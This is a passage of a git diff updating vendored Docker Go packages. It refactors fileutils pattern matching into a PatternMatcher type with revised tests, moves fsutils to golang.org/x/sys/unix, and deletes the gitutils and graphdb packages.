filepath.Match(pattern, path); err != nil { - return false, err +// Patterns returns array of active patterns +func (pm *PatternMatcher) Patterns() []*Pattern { + return pm.patterns +} + +// Pattern defines a single regexp used used to filter file paths. +type Pattern struct { + cleanedPattern string + dirs []string + regexp *regexp.Regexp + exclusion bool +} + +func (p *Pattern) String() string { + return p.cleanedPattern +} + +// Exclusion returns true if this pattern defines exclusion +func (p *Pattern) Exclusion() bool { + return p.exclusion +} + +func (p *Pattern) match(path string) (bool, error) { + + if p.regexp == nil { + if err := p.compile(); err != nil { + return false, filepath.ErrBadPattern + } } + b := p.regexp.MatchString(path) + + return b, nil +} + +func (p *Pattern) compile() error { + regStr := "^" + pattern := p.cleanedPattern // Go through the pattern and convert it to a regexp. // We use a scanner so we can support utf-8 chars. var scan scanner.Scanner @@ -161,17 +158,19 @@ func regexpMatch(pattern, path string) (bool, error) { // is some flavor of "**" scan.Next() + // Treat **/ as ** so eat the "/" + if string(scan.Peek()) == sl { + scan.Next() + } + if scan.Peek() == scanner.EOF { // is "**EOF" - to align with .gitignore just accept all regStr += ".*" } else { // is "**" - regStr += "((.*" + escSL + ")|([^" + escSL + "]*))" - } - - // Treat **/ as ** so eat the "/" - if string(scan.Peek()) == sl { - scan.Next() + // Note that this allows for any # of /'s (even 0) because + // the .* will eat everything, even /'s + regStr += "(.*" + escSL + ")?" } } else { // is "*" so map it to anything but "/" @@ -206,14 +205,30 @@ func regexpMatch(pattern, path string) (bool, error) { regStr += "$" - res, err := regexp.MatchString(regStr, path) + re, err := regexp.Compile(regStr) + if err != nil { + return err + } + + p.regexp = re + return nil +} - // Map regexp's error to filepath's so no one knows we're not using filepath +// Matches returns true if file matches any of the patterns +// and isn't excluded by any of the subsequent patterns. +func Matches(file string, patterns []string) (bool, error) { + pm, err := NewPatternMatcher(patterns) if err != nil { - err = filepath.ErrBadPattern + return false, err + } + file = filepath.Clean(file) + + if file == "." { + // Don't let them exclude everything, kind of silly. + return false, nil } - return res, err + return pm.Matches(file) } // CopyFile copies from src to dst until either EOF is reached diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go index ccd648fac3..e40cc271b3 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go @@ -1,4 +1,4 @@ -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go deleted file mode 100644 index 0f2cb7ab93..0000000000 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go +++ /dev/null @@ -1,7 +0,0 @@ -package fileutils - -// GetTotalUsedFds Returns the number of used File Descriptors. -// On Solaris these limits are per process and not systemwide -func GetTotalUsedFds() int { - return -1 -} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go index 6df1be89bb..4b5f129a50 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go @@ -1,6 +1,7 @@ -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" import ( + "fmt" "io/ioutil" "os" "path" @@ -8,6 +9,9 @@ import ( "runtime" "strings" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // CopyFile with invalid src @@ -208,7 +212,7 @@ func TestReadSymlinkedDirectoryToFile(t *testing.T) { func TestWildcardMatches(t *testing.T) { match, _ := Matches("fileutils.go", []string{"*"}) - if match != true { + if !match { t.Errorf("failed to get a wildcard match, got %v", match) } } @@ -216,7 +220,7 @@ func TestWildcardMatches(t *testing.T) { // A simple pattern match should return true. func TestPatternMatches(t *testing.T) { match, _ := Matches("fileutils.go", []string{"*.go"}) - if match != true { + if !match { t.Errorf("failed to get a match, got %v", match) } } @@ -224,7 +228,7 @@ func TestPatternMatches(t *testing.T) { // An exclusion followed by an inclusion should return true. func TestExclusionPatternMatchesPatternBefore(t *testing.T) { match, _ := Matches("fileutils.go", []string{"!fileutils.go", "*.go"}) - if match != true { + if !match { t.Errorf("failed to get true match on exclusion pattern, got %v", match) } } @@ -232,7 +236,7 @@ func TestExclusionPatternMatchesPatternBefore(t *testing.T) { // A folder pattern followed by an exception should return false. func TestPatternMatchesFolderExclusions(t *testing.T) { match, _ := Matches("docs/README.md", []string{"docs", "!docs/README.md"}) - if match != false { + if match { t.Errorf("failed to get a false match on exclusion pattern, got %v", match) } } @@ -240,7 +244,7 @@ func TestPatternMatchesFolderExclusions(t *testing.T) { // A folder pattern followed by an exception should return false. func TestPatternMatchesFolderWithSlashExclusions(t *testing.T) { match, _ := Matches("docs/README.md", []string{"docs/", "!docs/README.md"}) - if match != false { + if match { t.Errorf("failed to get a false match on exclusion pattern, got %v", match) } } @@ -248,7 +252,7 @@ func TestPatternMatchesFolderWithSlashExclusions(t *testing.T) { // A folder pattern followed by an exception should return false. func TestPatternMatchesFolderWildcardExclusions(t *testing.T) { match, _ := Matches("docs/README.md", []string{"docs/*", "!docs/README.md"}) - if match != false { + if match { t.Errorf("failed to get a false match on exclusion pattern, got %v", match) } } @@ -256,7 +260,7 @@ func TestPatternMatchesFolderWildcardExclusions(t *testing.T) { // A pattern followed by an exclusion should return false. func TestExclusionPatternMatchesPatternAfter(t *testing.T) { match, _ := Matches("fileutils.go", []string{"*.go", "!fileutils.go"}) - if match != false { + if match { t.Errorf("failed to get false match on exclusion pattern, got %v", match) } } @@ -264,7 +268,7 @@ func TestExclusionPatternMatchesPatternAfter(t *testing.T) { // A filename evaluating to . should return false. func TestExclusionPatternMatchesWholeDirectory(t *testing.T) { match, _ := Matches(".", []string{"*.go"}) - if match != false { + if match { t.Errorf("failed to get false match on ., got %v", match) } } @@ -277,14 +281,6 @@ func TestSingleExclamationError(t *testing.T) { } } -// A string preceded with a ! should return true from Exclusion. -func TestExclusion(t *testing.T) { - exclusion := exclusion("!") - if !exclusion { - t.Errorf("failed to get true for a single !, got %v", exclusion) - } -} - // Matches with no patterns func TestMatchesWithNoPatterns(t *testing.T) { matches, err := Matches("/any/path/there", []string{}) @@ -307,17 +303,14 @@ func TestMatchesWithMalformedPatterns(t *testing.T) { } } -// Test lots of variants of patterns & strings +type matchesTestCase struct { + pattern string + text string + pass bool +} + func TestMatches(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - tests := []struct { - pattern string - text string - pass bool - }{ + tests := []matchesTestCase{ {"**", "file", true}, {"**", "file/", true}, {"**/", "file", true}, // weird one @@ -325,7 +318,7 @@ func TestMatches(t *testing.T) { {"**", "/", true}, {"**/", "/", true}, {"**", "dir/file", true}, - {"**/", "dir/file", false}, + {"**/", "dir/file", true}, {"**", "dir/file/", true}, {"**/", "dir/file/", true}, {"**/**", "dir/file", true}, @@ -335,7 +328,7 @@ func TestMatches(t *testing.T) { {"dir/**", "dir/dir2/file", true}, {"dir/**", "dir/dir2/file/", true}, {"**/dir2/*", "dir/dir2/file", true}, - {"**/dir2/*", "dir/dir2/file/", false}, + {"**/dir2/*", "dir/dir2/file/", true}, {"**/dir2/**", "dir/dir2/dir3/file", true}, {"**/dir2/**", "dir/dir2/dir3/file/", true}, {"**file", "file", true}, @@ -369,9 +362,6 @@ func TestMatches(t *testing.T) { {"abc.def", "abcZdef", false}, {"abc?def", "abcZdef", true}, {"abc?def", "abcdef", false}, - {"a\\*b", "a*b", true}, - {"a\\", "a", false}, - {"a\\", "a\\", false}, {"a\\\\", "a\\", true}, {"**/foo/bar", "foo/bar", true}, {"**/foo/bar", "dir/foo/bar", true}, @@ -379,76 +369,92 @@ func TestMatches(t *testing.T) { {"abc/**", "abc", false}, {"abc/**", "abc/def", true}, {"abc/**", "abc/def/ghi", true}, + {"**/.foo", ".foo", true}, + {"**/.foo", "bar.foo", false}, } - for _, test := range tests { - res, _ := regexpMatch(test.pattern, test.text) - if res != test.pass { - t.Fatalf("Failed: %v - res:%v", test, res) - } + if runtime.GOOS != "windows" { + tests = append(tests, []matchesTestCase{ + {"a\\*b", "a*b", true}, + {"a\\", "a", false}, + {"a\\", "a\\", false}, + }...) } -} -// An empty string should return true from Empty. -func TestEmpty(t *testing.T) { - empty := empty("") - if !empty { - t.Errorf("failed to get true for an empty string, got %v", empty) + for _, test := range tests { + desc := fmt.Sprintf("pattern=%q text=%q", test.pattern, test.text) + pm, err := NewPatternMatcher([]string{test.pattern}) + assert.NilError(t, err, desc) + res, _ := pm.Matches(test.text) + assert.Check(t, is.Equal(test.pass, res), desc) } } func TestCleanPatterns(t *testing.T) { - cleaned, _, _, _ := CleanPatterns([]string{"docs", "config"}) + patterns := []string{"docs", "config"} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + cleaned := pm.Patterns() if len(cleaned) != 2 { t.Errorf("expected 2 element slice, got %v", len(cleaned)) } } func TestCleanPatternsStripEmptyPatterns(t *testing.T) { - cleaned, _, _, _ := CleanPatterns([]string{"docs", "config", ""}) + patterns := []string{"docs", "config", ""} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + cleaned := pm.Patterns() if len(cleaned) != 2 { t.Errorf("expected 2 element slice, got %v", len(cleaned)) } } func TestCleanPatternsExceptionFlag(t *testing.T) { - _, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md"}) - if !exceptions { - t.Errorf("expected exceptions to be true, got %v", exceptions) + patterns := []string{"docs", "!docs/README.md"} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + if !pm.Exclusions() { + t.Errorf("expected exceptions to be true, got %v", pm.Exclusions()) } } func TestCleanPatternsLeadingSpaceTrimmed(t *testing.T) { - _, _, exceptions, _ := CleanPatterns([]string{"docs", " !docs/README.md"}) - if !exceptions { - t.Errorf("expected exceptions to be true, got %v", exceptions) + patterns := []string{"docs", " !docs/README.md"} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + if !pm.Exclusions() { + t.Errorf("expected exceptions to be true, got %v", pm.Exclusions()) } } func TestCleanPatternsTrailingSpaceTrimmed(t *testing.T) { - _, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md "}) - if !exceptions { - t.Errorf("expected exceptions to be true, got %v", exceptions) + patterns := []string{"docs", "!docs/README.md "} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + if !pm.Exclusions() { + t.Errorf("expected exceptions to be true, got %v", pm.Exclusions()) } } func TestCleanPatternsErrorSingleException(t *testing.T) { - _, _, _, err := CleanPatterns([]string{"!"}) + patterns := []string{"!"} + _, err := NewPatternMatcher(patterns) if err == nil { t.Errorf("expected error on single exclamation point, got %v", err) } } -func TestCleanPatternsFolderSplit(t *testing.T) { - _, dirs, _, _ := CleanPatterns([]string{"docs/config/CONFIG.md"}) - if dirs[0][0] != "docs" { - t.Errorf("expected first element in dirs slice to be docs, got %v", dirs[0][1]) - } - if dirs[0][1] != "config" { - t.Errorf("expected first element in dirs slice to be config, got %v", dirs[0][1]) - } -} - func TestCreateIfNotExistsDir(t *testing.T) { tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") if err != nil { @@ -506,7 +512,7 @@ var matchTests = []matchTest{ {"*c", "abc", true, nil}, {"a*", "a", true, nil}, {"a*", "abc", true, nil}, - {"a*", "ab/c", false, nil}, + {"a*", "ab/c", true, nil}, {"a*/b", "abc/b", true, nil}, {"a*/b", "a/c/b", false, nil}, {"a*b*c*d*e*/f", "axbxcxdxe/f", true, nil}, @@ -570,14 +576,14 @@ func TestMatch(t *testing.T) { pattern := tt.pattern s := tt.s if runtime.GOOS == "windows" { - if strings.Index(pattern, "\\") >= 0 { + if strings.Contains(pattern, "\\") { // no escape allowed on windows. continue } pattern = filepath.Clean(pattern) s = filepath.Clean(s) } - ok, err := regexpMatch(pattern, s) + ok, err := Matches(s, []string{pattern}) if ok != tt.match || err != tt.err { t.Fatalf("Match(%#q, %#q) = %v, %q want %v, %q", pattern, s, ok, errp(err), tt.match, errp(tt.err)) } diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go index d5c3abf568..565396f1c7 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go @@ -1,13 +1,13 @@ // +build linux freebsd -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" import ( "fmt" "io/ioutil" "os" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) // GetTotalUsedFds Returns the number of used File Descriptors by diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go index 5ec21cace5..3f1ebb6567 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go @@ -1,4 +1,4 @@ -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" // GetTotalUsedFds Returns the number of used File Descriptors. Not supported // on Windows. diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go index 9fd054e77f..104211adea 100644 --- a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go +++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go @@ -1,13 +1,12 @@ -// +build linux - -package fsutils +package fsutils // import "github.com/docker/docker/pkg/fsutils" import ( "fmt" "io/ioutil" "os" - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) func locateDummyIfEmpty(path string) (string, error) { @@ -23,10 +22,8 @@ func locateDummyIfEmpty(path string) (string, error) { return "", err } name := dummyFile.Name() - if err = dummyFile.Close(); err != nil { - return name, err - } - return name, nil + err = dummyFile.Close() + return name, err } // SupportsDType returns whether the filesystem mounted on path supports d_type @@ -42,9 +39,9 @@ func SupportsDType(path string) (bool, error) { visited := 0 supportsDType := true - fn := func(ent *syscall.Dirent) bool { + fn := func(ent *unix.Dirent) bool { visited++ - if ent.Type == syscall.DT_UNKNOWN { + if ent.Type == unix.DT_UNKNOWN { supportsDType = false // stop iteration return true @@ -61,7 +58,7 @@ func SupportsDType(path string) (bool, error) { return supportsDType, nil } -func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error { +func iterateReadDir(path string, fn func(*unix.Dirent) bool) error { d, err := os.Open(path) if err != nil { return err @@ -70,7 +67,7 @@ func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error { fd := int(d.Fd()) buf := make([]byte, 4096) for { - nbytes, err := syscall.ReadDirent(fd, buf) + nbytes, err := unix.ReadDirent(fd, buf) if err != nil { return err } @@ -78,7 +75,7 @@ func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error { break } for off := 0; off < nbytes; { - ent := (*syscall.Dirent)(unsafe.Pointer(&buf[off])) + ent := (*unix.Dirent)(unsafe.Pointer(&buf[off])) if stop := fn(ent); stop { return nil } diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go index 4a648239c0..4e5a78b519 100644 --- a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go @@ -1,13 +1,14 @@ // +build linux -package fsutils +package fsutils // import "github.com/docker/docker/pkg/fsutils" import ( "io/ioutil" "os" "os/exec" - "syscall" "testing" + + "golang.org/x/sys/unix" ) func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg ...string) { @@ -53,7 +54,7 @@ func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg } // loopback-mount the image. - // for ease of setting up loopback device, we use os/exec rather than syscall.Mount + // for ease of setting up loopback device, we use os/exec rather than unix.Mount out, err = exec.Command("mount", "-o", "loop", imageFileName, mountpoint).CombinedOutput() if len(out) > 0 { t.Log(string(out)) @@ -62,7 +63,7 @@ func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg t.Skip("skipping the test because mount failed") } defer func() { - if err := syscall.Unmount(mountpoint, 0); err != nil { + if err := unix.Unmount(mountpoint, 0); err != nil { t.Fatal(err) } }() diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go deleted file mode 100644 index ded091f2a2..0000000000 --- a/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go +++ /dev/null @@ -1,100 +0,0 @@ -package gitutils - -import ( - "fmt" - "io/ioutil" - "net/http" - "net/url" - "os" - "os/exec" - "path/filepath" - "strings" - - "github.com/docker/docker/pkg/symlink" - "github.com/docker/docker/pkg/urlutil" -) - -// Clone clones a repository into a newly created directory which -// will be under "docker-build-git" -func Clone(remoteURL string) (string, error) { - if !urlutil.IsGitTransport(remoteURL) { - remoteURL = "https://" + remoteURL - } - root, err := ioutil.TempDir("", "docker-build-git") - if err != nil { - return "", err - } - - u, err := url.Parse(remoteURL) - if err != nil { - return "", err - } - - fragment := u.Fragment - clone := cloneArgs(u, root) - - if output, err := git(clone...); err != nil { - return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output) - } - - return checkoutGit(fragment, root) -} - -func cloneArgs(remoteURL *url.URL, root string) []string { - args := []string{"clone", "--recursive"} - shallow := len(remoteURL.Fragment) == 0 - - if shallow && strings.HasPrefix(remoteURL.Scheme, "http") { - res, err := http.Head(fmt.Sprintf("%s/info/refs?service=git-upload-pack", remoteURL)) - if err != nil || res.Header.Get("Content-Type") != "application/x-git-upload-pack-advertisement" { - shallow = false - } - } - - if shallow { - args = append(args, "--depth", "1") - } - - if remoteURL.Fragment != "" { - remoteURL.Fragment = "" - } - - return append(args, remoteURL.String(), root) -} - -func checkoutGit(fragment, root string) (string, error) { - refAndDir := strings.SplitN(fragment, ":", 2) - - if len(refAndDir[0]) != 0 { - if output, err := gitWithinDir(root, "checkout", refAndDir[0]); err != nil { - return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output) - } - } - - if len(refAndDir) > 1 && len(refAndDir[1]) != 0 { - newCtx, err := symlink.FollowSymlinkInScope(filepath.Join(root, refAndDir[1]), root) - if err != nil { - return "", fmt.Errorf("Error setting git context, %q not within git root: %s", refAndDir[1], err) - } - - fi, err := os.Stat(newCtx) - if err != nil { - return "", err - } - if !fi.IsDir() { - return "", fmt.Errorf("Error setting git context, not a directory: %s", newCtx) - } - root = newCtx - } - - return root, nil -} - -func gitWithinDir(dir string, args ...string) ([]byte, error) { - a := []string{"--work-tree", dir, "--git-dir", filepath.Join(dir, ".git")} - return git(append(a, args...)...) -} - -func git(args ...string) ([]byte, error) { - return exec.Command("git", args...).CombinedOutput() -} diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go deleted file mode 100644 index d197058d20..0000000000 --- a/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go +++ /dev/null @@ -1,220 +0,0 @@ -package gitutils - -import ( - "fmt" - "io/ioutil" - "net/http" - "net/http/httptest" - "net/url" - "os" - "path/filepath" - "reflect" - "runtime" - "strings" - "testing" -) - -func TestCloneArgsSmartHttp(t *testing.T) { - mux := http.NewServeMux() - server := httptest.NewServer(mux) - serverURL, _ := url.Parse(server.URL) - - serverURL.Path = "/repo.git" - gitURL := serverURL.String() - - mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { - q := r.URL.Query().Get("service") - w.Header().Set("Content-Type", fmt.Sprintf("application/x-%s-advertisement", q)) - }) - - args := cloneArgs(serverURL, "/tmp") - exp := []string{"clone", "--recursive", "--depth", "1", gitURL, "/tmp"} - if !reflect.DeepEqual(args, exp) { - t.Fatalf("Expected %v, got %v", exp, args) - } -} - -func TestCloneArgsDumbHttp(t *testing.T) { - mux := http.NewServeMux() - server := httptest.NewServer(mux) - serverURL, _ := url.Parse(server.URL) - - serverURL.Path = "/repo.git" - gitURL := serverURL.String() - - mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { - w.Header().Set("Content-Type", "text/plain") - }) - - args := cloneArgs(serverURL, "/tmp") - exp := []string{"clone", "--recursive", gitURL, "/tmp"} - if !reflect.DeepEqual(args, exp) { - t.Fatalf("Expected %v, got %v", exp, args) - } -} - -func TestCloneArgsGit(t *testing.T) { - u, _ := url.Parse("git://github.com/docker/docker") - args := cloneArgs(u, "/tmp") - exp := []string{"clone", "--recursive", "--depth", "1", "git://github.com/docker/docker", "/tmp"} - if !reflect.DeepEqual(args, exp) { - t.Fatalf("Expected %v, got %v", exp, args) - } -} - -func TestCloneArgsStripFragment(t *testing.T) { - u, _ := url.Parse("git://github.com/docker/docker#test") - args := cloneArgs(u, "/tmp") - exp := []string{"clone", "--recursive", "git://github.com/docker/docker", "/tmp"} - if !reflect.DeepEqual(args, exp) { - t.Fatalf("Expected %v, got %v", exp, args) - } -} - -func gitGetConfig(name string) string { - b, err := git([]string{"config", "--get", name}...) - if err != nil { - // since we are interested in empty or non empty string, - // we can safely ignore the err here. - return "" - } - return strings.TrimSpace(string(b)) -} - -func TestCheckoutGit(t *testing.T) { - root, err := ioutil.TempDir("", "docker-build-git-checkout") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(root) - - autocrlf := gitGetConfig("core.autocrlf") - if !(autocrlf == "true" || autocrlf == "false" || - autocrlf == "input" || autocrlf == "") { - t.Logf("unknown core.autocrlf value: \"%s\"", autocrlf) - } - eol := "\n" - if autocrlf == "true" { - eol = "\r\n" - } - - gitDir := filepath.Join(root, "repo") - _, err = git("init", gitDir) - if err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "config", "user.email", "test@docker.com"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "config", "user.name", "Docker test"); err != nil { - t.Fatal(err) - } - - if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch"), 0644); err != nil { - t.Fatal(err) - } - - subDir := filepath.Join(gitDir, "subdir") - if err = os.Mkdir(subDir, 0755); err != nil { - t.Fatal(err) - } - - if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 5000"), 0644); err != nil { - t.Fatal(err) - } - - if runtime.GOOS != "windows" { - if err = os.Symlink("../subdir", filepath.Join(gitDir, "parentlink")); err != nil { - t.Fatal(err) - } - - if err = os.Symlink("/subdir", filepath.Join(gitDir, "absolutelink")); err != nil { - t.Fatal(err) - } - } - - if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "commit", "-am", "First commit"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "checkout", "-b", "test"); err != nil { - t.Fatal(err) - } - - if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 3000"), 0644); err != nil { - t.Fatal(err) - } - - if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM busybox\nEXPOSE 5000"), 0644); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "commit", "-am", "Branch commit"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "checkout", "master"); err != nil { - t.Fatal(err) - } - - type singleCase struct { - frag string - exp string - fail bool - } - - cases := []singleCase{ - {"", "FROM scratch", false}, - {"master", "FROM scratch", false}, - {":subdir", "FROM scratch" + eol + "EXPOSE 5000", false}, - {":nosubdir", "", true}, // missing directory error - {":Dockerfile", "", true}, // not a directory error - {"master:nosubdir", "", true}, - {"master:subdir", "FROM scratch" + eol + "EXPOSE 5000", false}, - {"master:../subdir", "", true}, - {"test", "FROM scratch" + eol + "EXPOSE 3000", false}, - {"test:", "FROM scratch" + eol + "EXPOSE 3000", false}, - {"test:subdir", "FROM busybox" + eol + "EXPOSE 5000", false}, - } - - if runtime.GOOS != "windows" { - // Windows GIT (2.7.1 x64) does not support parentlink/absolutelink. Sample output below - // git --work-tree .\repo --git-dir .\repo\.git add -A - // error: readlink("absolutelink"): Function not implemented - // error: unable to index file absolutelink - // fatal: adding files failed - cases = append(cases, singleCase{frag: "master:absolutelink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) - cases = append(cases, singleCase{frag: "master:parentlink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) - } - - for _, c := range cases { - r, err := checkoutGit(c.frag, gitDir) - - fail := err != nil - if fail != c.fail { - t.Fatalf("Expected %v failure, error was %v\n", c.fail, err) - } - if c.fail { - continue - } - - b, err := ioutil.ReadFile(filepath.Join(r, "Dockerfile")) - if err != nil { - t.Fatal(err) - } - - if string(b) != c.exp { - t.Fatalf("Expected %v, was %v\n", c.exp, string(b)) - } - } -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go deleted file mode 100644 index 8e61ff3b4f..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go +++ /dev/null @@ -1,19 +0,0 @@ -// +build cgo - -package graphdb - -import ( - "database/sql" - - _ "github.com/mattn/go-sqlite3" // registers sqlite -) - -// NewSqliteConn opens a connection to a sqlite -// database. -func NewSqliteConn(root string) (*Database, error) { - conn, err := sql.Open("sqlite3", root) - if err != nil { - return nil, err - } - return NewDatabase(conn) -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go deleted file mode 100644 index eca433fa85..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go +++ /dev/null @@ -1,551 +0,0 @@ -package graphdb - -import ( - "database/sql" - "fmt" - "path" - "strings" - "sync" -) - -const ( - createEntityTable = ` - CREATE TABLE IF NOT EXISTS entity ( - id text NOT NULL PRIMARY KEY - );` - - createEdgeTable = ` - CREATE TABLE IF NOT EXISTS edge ( - "entity_id" text NOT NULL, - "parent_id" text NULL, - "name" text NOT NULL, - CONSTRAINT "parent_fk" FOREIGN KEY ("parent_id") REFERENCES "entity" ("id"), - CONSTRAINT "entity_fk" FOREIGN KEY ("entity_id") REFERENCES "entity" ("id") - ); - ` - - createEdgeIndices = ` - CREATE UNIQUE INDEX IF NOT EXISTS "name_parent_ix" ON "edge" (parent_id, name); - ` -) - -// Entity with a unique id. -type Entity struct { - id string -} - -// An Edge connects two entities together. -type Edge struct { - EntityID string - Name string - ParentID string -} - -// Entities stores the list of entities. -type Entities map[string]*Entity - -// Edges stores the relationships between entities. -type Edges []*Edge - -// WalkFunc is a function invoked to process an individual entity. -type WalkFunc func(fullPath string, entity *Entity) error - -// Database is a graph database for storing entities and their relationships. -type Database struct { - conn *sql.DB - mux sync.RWMutex -} - -// IsNonUniqueNameError processes the error to check if it's caused by -// a constraint violation. -// This is necessary because the error isn't the same across various -// sqlite versions. -func IsNonUniqueNameError(err error) bool { - str := err.Error() - // sqlite 3.7.17-1ubuntu1 returns: - // Set failure: Abort due to constraint violation: columns parent_id, name are not unique - if strings.HasSuffix(str, "name are not unique") { - return true - } - // sqlite-3.8.3-1.fc20 returns: - // Set failure: Abort due to constraint violation: UNIQUE constraint failed: edge.parent_id, edge.name - if strings.Contains(str, "UNIQUE constraint failed") && strings.Contains(str, "edge.name") { - return true - } - // sqlite-3.6.20-1.el6 returns: - // Set failure: Abort due to constraint violation: constraint failed - if strings.HasSuffix(str, "constraint failed") { - return true - } - return false -} - -// NewDatabase creates a new graph database initialized with a root entity. -func NewDatabase(conn *sql.DB) (*Database, error) { - if conn == nil { - return nil, fmt.Errorf("Database connection cannot be nil") - } - db := &Database{conn: conn} - - // Create root entities - tx, err := conn.Begin() - if err != nil { - return nil, err - } - - if _, err := tx.Exec(createEntityTable); err != nil { - return nil, err - } - if _, err := tx.Exec(createEdgeTable); err != nil { - return nil, err - } - if _, err := tx.Exec(createEdgeIndices); err != nil { - return nil, err - } - - if _, err := tx.Exec("DELETE FROM entity where id = ?", "0"); err != nil { - tx.Rollback() - return nil, err - } - - if _, err := tx.Exec("INSERT INTO entity (id) VALUES (?);", "0"); err != nil { - tx.Rollback() - return nil, err - } - - if _, err := tx.Exec("DELETE FROM edge where entity_id=? and name=?", "0", "/"); err != nil { - tx.Rollback() - return nil, err - } - - if _, err := tx.Exec("INSERT INTO edge (entity_id, name) VALUES(?,?);", "0", "/"); err != nil { - tx.Rollback() - return nil, err - } - - if err := tx.Commit(); err != nil { - return nil, err - } - - return db, nil -} - -// Close the underlying connection to the database. -func (db *Database) Close() error { - return db.conn.Close() -} - -// Set the entity id for a given path. -func (db *Database) Set(fullPath, id string) (*Entity, error) { - db.mux.Lock() - defer db.mux.Unlock() - - tx, err := db.conn.Begin() - if err != nil { - return nil, err - } - - var entityID string - if err := tx.QueryRow("SELECT id FROM entity WHERE id = ?;", id).Scan(&entityID); err != nil { - if err == sql.ErrNoRows { - if _, err := tx.Exec("INSERT INTO entity (id) VALUES(?);", id); err 